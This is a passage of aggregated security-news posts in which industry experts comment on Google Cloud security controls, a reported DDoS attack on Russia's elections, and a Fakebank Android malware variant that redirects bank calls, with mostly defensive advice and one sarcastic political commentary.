“Cloud adoption is ramping rapidly and the adoption of cloud-based applications has entered the mainstream. Each cloud vendor has a variety of cloud controls, but this gets very complicated as enterprises scale their applications across multiple clouds.

As we saw very recently with the Amazon cloud breaches involving Walmart and then subsequently with Federal Express, your data may be exposed due to human error or other unforeseen factors using any vendor. It remains essential to deploy a single unified cloud security platform that can secure enterprise data using encryption. Using tools such as cloud access security brokers (also called cloud gateways) you can encrypt data within applications, and in the event of a breach of the data within Google, Amazon or Microsoft Azure your data will remain protected. These same capabilities are also part of the critical infrastructure larger enterprise needs to address challenging compliance regulations such as GDPR.”

Mark James, Security Specialist at ESET:

Should companies still use additional security, on top of what Google of offering, to protect against cyber threats?

“The fine art of cyber defence relies on multi-layered techniques designed to integrate and strengthen your security. Long gone are the days of a single magic bullet that will keep you safe from malicious intent. From my point of view anything that can be done by the “tech giants” to not only protect the individuals and their brands is a plus. If your able to add to your security to compliment what they are doing then “go for it”. As much as we like others to do all the hard work, we need to do what we can to protect our own data, over and above what’s provided by default.”

Do you think the move will encourage more tech giants to follow suit and offer additional security controls for their customers?

“Yes, well I hope so. In this competitive world companies will need to keep up. Offering something that protects or enhances the user experience will encourage more to take up those services, and even more so as we move towards GDPR and beyond. Having a choice of companies and services only enhances the users security and encourages other companies to keep up and develop and grow their own services they offer.”

Do you see this as a positive step from Google?

“Yes absolutely, the user needs all the help they can get and being able to utilise the expertise and knowledge of Google will only enhance their ability to protect their data, that has sadly become the modern day “gold at the end of the rainbow”.”

The ISBuzz Post: This Post Google Cloud Platform Security appeared first on Information Security Buzz.

Russia DDoS Election Interference Attack

The ISBuzz Post: This Post Russia DDoS Election Interference Attack appeared first on Information Security Buzz.

In response to reports of a DDoS attack launched to interfere with Russian elections, IT security experts commented below.

Sean Newman, Director of Product Management at Corero Network Security:

“Reports of DDoS attacks on the Russian, or any other government, elections come as no surprise. There’s no better time to make your point, whether it’s political, moral or otherwise, whichever side of the political fence you sit.  One thing you can say though is that it’s typically virtually impossible to determine the true source of the attack, as where the DDoS traffic emanates from is almost certainly not directly related to either the attacker, those who funded the attacks, or the geographical region they are located in.

“You’re not going to stop the sources of these attacks from trying to make their point, but you can protect the integrity of the systems being used for the democratic process.  The latest always-on real-time automated DDoS protection solutions can keep systems online, and available for citizens to access at all times during the voting process.”

Lee Munson, Security Researcher at 

“As everyone knows by now, all the cool kids get hit by cyberattacks and so, in an attempt to look hip, The People’s Republic of Russia has claimed its very own sob story in the form of a Distributed Denial of Service attack during its recent presidential procession.

“The fifteen alleged powerful nation state virtual combatants, which may have included England, Wales, Ireland and the rebel alliance north of Hadrian’s Wall, could well have been mustering the proposed retaliation for the recent Salisbury poisoning of someone no-one cared about, just a few short weeks ago.

“In fact, given how ineffective the cyber-attack was, I’m pretty sure the combined power of the UK must have been behind it, especially given all the fake news in the British press about how Putin would be re-elected before a single vote had been cast.

“Next week, I expect the same attackers to strike again, this time using puppet politicians to decry the encryption in messaging apps that allowed those nasty vodka-swilling Ruskies to influence the real democratic election across the pond that saw our American friends get exactly what they deserved.”

The ISBuzz Post: This Post Russia DDoS Election Interference Attack appeared first on Information Security Buzz.

New Fakebank Android Malware

The ISBuzz Post: This Post New Fakebank Android Malware appeared first on Information Security Buzz.

Late last week researchers at Symantec warned of a new variant of the Fakebank Android malware family that has an unusual twist. Once installed the malware will intercept mobile calls you attempt to make to your bank, and instead direct them to a scammer impersonating an agent working for the bank. Furthermore, the malware will intercept calls from the *scammers*, and display a fake caller ID to make it appear as though the call is really from the legitimate bank. IT security experts commented below.

Frederik Mennes,  Senior Manager for Market and Security Strategy at VASCO:

“Banks can protect themselves against “vishing” (voice phishing) attacks by educating users, for example explaining that they shouldn’t install apps from unofficial stores, and requesting they review app privileges. However this approach fails if the user makes a mistake. A stronger and better approach to protect against vishing consists of implementing transaction authentication, whereby the user must generate a valid dynamic authentication code in order to confirm a financial transaction. Fraudsters will have trouble convincing the user to generate and provide a valid authentication code or a fraudulent financial transaction, and hence will be stopped before doing any harm.”

Paul Bischoff, Privacy Advocate at

“The Fakebank Android malware could soon be a model adopted by malware makers in parts of the world outside South Korea. Even though the attack uses a fairly novel approach to scam users, Android owners can avoid it using the same best practices used to avoid any other type of malware. First, update Android to the latest stable version. The newest release, Oreo, prevents the caller ID from being spoofed by the malware. Avoid downloading apps and files from unknown sources. Don’t trust apps from third-party app stores, and be wary of links in web pages and emails. It’s also important to review and limit the permissions of apps you install, and install and run antivirus regularly.”

The ISBuzz Post: This Post New Fakebank Android Malware appeared first on Information Security Buzz.